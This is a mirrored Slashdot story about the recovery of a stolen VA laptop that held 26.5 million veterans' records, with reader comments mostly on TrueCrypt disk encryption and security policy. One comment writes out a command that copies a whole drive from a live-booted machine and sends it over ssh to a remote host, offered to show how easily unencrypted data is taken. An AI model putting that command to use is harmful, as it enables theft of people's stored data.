Slashdot Mirror

← Back to Stories (view on slashdot.org)

Stolen VA Laptop Recovered

Posted by ryuzaki0 on from the vets-less-nervous dept.

lancejjj writes "Remember how the VA was pinning the theft of 26.5 million veterans' personal records on a hard working-but-renegade employee whose laptop was stolen? Surprise! It turns out that the employee had written permission to bring the sensitive data home. Fortunately, the laptop has been recovered. It is still unclear how the laptop was recovered, or if any of the veterans' personal data was leaked."

10 of 202 comments (clear)

  1. TrueCrypt by Spy+der+Mann · · Score: 4, Informative

    After discovering truecrypt, I realized how easy it is to have your sensitive data secured. Provided that the laptop doesn't contain spyware, only the person with password to the truecrypt volume can read it. After it's turned off, nobody else can.

    And the hidden volumes feature in truecrypt makes it much harder to steal the data (not only you'd need the normal volume password, you'd also need the hidden volume password - IF there is a hidden volume, which you don't know).

    1. Re:TrueCrypt by VertigoAce · · Score: 4, Informative

      That isn't the purpose of the hidden volume. You only need the hidden volume password to access that volume. The actual purpose is so that if you are compelled to give access to the encrypted data you can just give out the outer volume's password. Used properly, there's no way to tell if there is a hidden volume or not, so no one can compel you to give the password for that volume. So basically, store some semi-sensitive data in the outer volume and your very sensitive data in the hidden volume. Maybe also create some volumes without hidden sections so you have plausible deniability.

    2. Re:TrueCrypt by citizenklaw · · Score: 4, Informative

      Disagree. On the preferences, TrueCrypt enables you to Auto-Dismount the encrypted partition when a user logs off, when the screen saver is launched, the computer enters power saving mode, if no data is read written for x amount of time, etc. You can even tell the program to force a dismount even if the volume contains open files/directories

      My settings are simple: dismount when I log off and when the computer goes into power saving mode. I like this little app.

      --
      the future is but past forgotten
  2. Bah... by citizenklaw · · Score: 4, Informative

    Nothing appeared to be copied? Bah. What's keeping a would be data thief to boot up with a Linux distro, copy at will and shutdown the computer

    .

    I use a utility called TrueCrypt on my computer. I don't use a Mac (I would if I had the money), but I think the Mac has a utility (built in to the OS to boot) that let's you encrypt the contents of your home folder. This utility (TrueCrypt) enables me to reserve a chunk of space on my HD and encrypt it. I'm pretty confident that if my laptop gets stolen, the data will be *reasonably* safe.

    This is just a mix of bad infosec policies and worse OS.

    --
    the future is but past forgotten
    1. Re:Bah... by klmth · · Score: 2, Informative

      You must be joking. 2^256 is simply too large to ever be crackable. 2^256 translates to more states than there are estimated to be atoms in the universe; in other words, you will have to use the entire universe to build your computer. There is no possible way that AES or any other block cipher will ever be brute forced. So that leaves you with password security as the weakest link. In truecrypt, your passphrase and keyfiles are used to scramble the key. Using a unique file on a USB dongle as the key and randomized letters as the password, you will be safe from any brute force attempts.

      Of course, there might be some weaknesses with the AES algorithm, but to date no such attack has been found, at does not seem likely to surface.

  3. I do. by WebHostingGuy · · Score: 2, Informative

    I got the letter stating my info was in there.

    (Although I saw this article earlier elsewhere.)

    --
    Quality Hosting e3 Servers
  4. Re:Data Wasn't Accessed by hazem · · Score: 4, Informative

    You don't even have to pull the drive.

    Just boot with knoppix, or some other bootable linux on a cd and do something like:

    dd if=/dev/hda |gzip -9 |ssh -l someuser somemachine.com "dd of=stolendrivebackup.gz"

  5. That's how cargo theft works by Kadin2048 · · Score: 3, Informative

    Actually you don't have to have your tinfoil hat on too tight to believe that.

    The situation you describe is not at all unlike how the mafia cargo-theft operations run (or used to run...the people I know are all ex-OCTF types). Basically they'd find some truck driver who had a gambling problem, and make him a deal: he parks his truck at a certain rest area on a certain night, and goes into the restaurant to have dinner. When he gets out, his truck is missing. Sometimes they'd even arrange it so that the cargo in question that night would be particularly high-value (load of VCRs, whatever), or easy to fence merchandise.

    The key question in the data-theft is whether or not U.S. organized crime is really involved in large-scale identity theft, to the point where they would have wanted to get their hands on a laptop full of data that badly. If you think that they are, then the whole scenario doesn't seem totally implausible.

    I'm fairly confident, however, that the FBI is probably looking down this angle -- it's not really that hard a thing to imagine, so I expect that they're going through the employee's finances and everything else, seeing if there's some way he could have been compromised.

    --
    "Ladies and gentlemen, my killbot features Lotus Notes and a machine gun. It is the finest available."
  6. Re:Why real data? by HardCase · · Score: 2, Informative

    Also, it's just shameful the way a bunch of middle-management types are trying to shaft the analyst when he's had written permission for ~4 years.

    Yeah, just ask the assistant secretary (Dennis Duffy) and the deputy assistant secretary (Michael McLendon). Oh wait, they've all been fired.

    -h-

  7. Re:As Gomer Pyle used to say... by __aaclcg7560 · · Score: 2, Informative

    Not sure if it was ineptitude or the bureaucracy that prevented the site admins from making changes without the permission of some central office but, this type of security is mostly to blame for the recent incident.

    If access to the network is being granted by Active Directory, giving the user access to the local admin account is relatively OK for them updating software/hardware on their machine since that account can't get on the network. That's how the machines at my current job are set up and I wouldn't be surprised if this practice is widespread. This is a "flaw" that's supposed to be fixed in Windows Vista.